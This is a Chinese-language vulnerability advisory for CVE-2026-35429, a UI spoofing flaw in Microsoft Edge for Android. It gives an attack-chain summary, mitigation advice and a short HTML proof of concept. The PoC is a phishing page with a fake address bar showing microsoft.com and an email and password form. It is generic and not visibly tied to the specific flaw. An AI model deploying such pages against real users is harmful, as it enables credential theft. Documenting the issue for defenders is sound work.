CVE-2026-35429 CVSS 4.3 中危

CVE-2026-35429 Microsoft Edge for Android 欺骗漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35429

漏洞类型

欺骗漏洞 (Spoofing)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Microsoft Edge for Android

漏洞概述

该漏洞存在于Microsoft Edge for Android浏览器中，源于用户界面（UI）未能正确呈现关键信息。未经身份验证的攻击者可利用此缺陷通过网络实施欺骗攻击，误导用户与恶意界面交互，从而可能导致敏感信息泄露。

技术细节

漏洞原理在于Edge for Android的UI渲染机制存在缺陷，允许网页内容伪造或覆盖浏览器原生的安全指示元素（如地址栏）。攻击者可构造特制网页，利用CSS定位和HTML结构模拟合法的浏览器界面。当受害者访问恶意链接时，攻击者诱导其在伪造的界面中输入信息。由于无需预先认证且利用了用户对浏览器UI的信任，该漏洞能有效地绕过用户的安全警惕性，导致机密性受损。

攻击链分析

STEP 1

1. 准备阶段

攻击者构建包含恶意UI欺骗代码的网页，并托管在可控服务器上。

STEP 2

2. 投递阶段

攻击者通过网络（如电子邮件、社交媒体）将恶意链接发送给目标用户。

STEP 3

3. 利用阶段

用户使用Microsoft Edge for Android点击链接并访问页面，恶意代码触发表面UI欺骗。

STEP 4

4. 攻击达成

用户被伪造的UI误导，输入敏感信息，攻击者收集并利用这些信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept: UI Spoofing Simulation -->
<!DOCTYPE html>
<html>
<head>
<style>
  /* Styles to mimic browser address bar */
  .fake-bar {
    position: fixed; top: 0; left: 0; width: 100%; height: 40px;
    background: #333; color: white; display: flex; align-items: center; padding: 0 10px;
    font-family: sans-serif; z-index: 9999;
  }
  .content { margin-top: 50px; padding: 20px; }
</style>
</head>
<body>
  <!-- Fake Address Bar -->
  <div class="fake-bar">
    <span>🔒 https://www.microsoft.com</span>
  </div>
  <!-- Malicious Content -->
  <div class="content">
    <h2>Security Alert</h2>
    <p>Please verify your credentials.</p>
    <input type="text" placeholder="Email" /><br><br>
    <input type="password" placeholder="Password" />
  </div>
</body>
</html>

影响范围

Microsoft Edge for Android (具体受影响版本请参考厂商安全公告)

防御指南

临时缓解措施

建议用户立即检查并安装Android系统及Edge浏览器的更新补丁。在未修复前，避免点击来源不明的链接，且在涉及敏感操作时，尝试通过长按链接查看真实URL或切换至其他可信浏览器进行验证。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表